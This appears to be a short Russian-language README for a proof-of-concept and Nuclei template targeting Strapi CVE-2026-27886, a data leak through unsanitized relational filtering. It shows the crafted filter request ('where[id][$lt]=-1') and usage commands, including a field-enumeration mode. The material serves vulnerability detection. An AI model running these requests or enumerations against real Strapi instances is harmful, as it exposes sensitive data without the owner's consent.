
Strapi CVE-2026-27886. Утечка чувствительных данных через реляционную фильтрацию из-за отсутствия санитизации запросов
Только для авторизованного тестирования безопасности.
Включает:
CVE-2026-27886.py — PoC на PythonCVE-2026-27886.yaml — шаблон Nuclei для обнаруженияЧекер отправляет два запроса к публичной конечной точке коллекции Strapi Content API:
GET /api/<collection>
GET /api/<collection>?where[id][$lt]=-1
Если в базовом ответе есть записи, а ложный предикат where схлопывает результирующий набор до нуля, конечная точка, вероятно, уязвима.
Безопасная проверка:
python3 CVE-2026-27886.py http://strapi/api/articles
Перечисление полей:
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles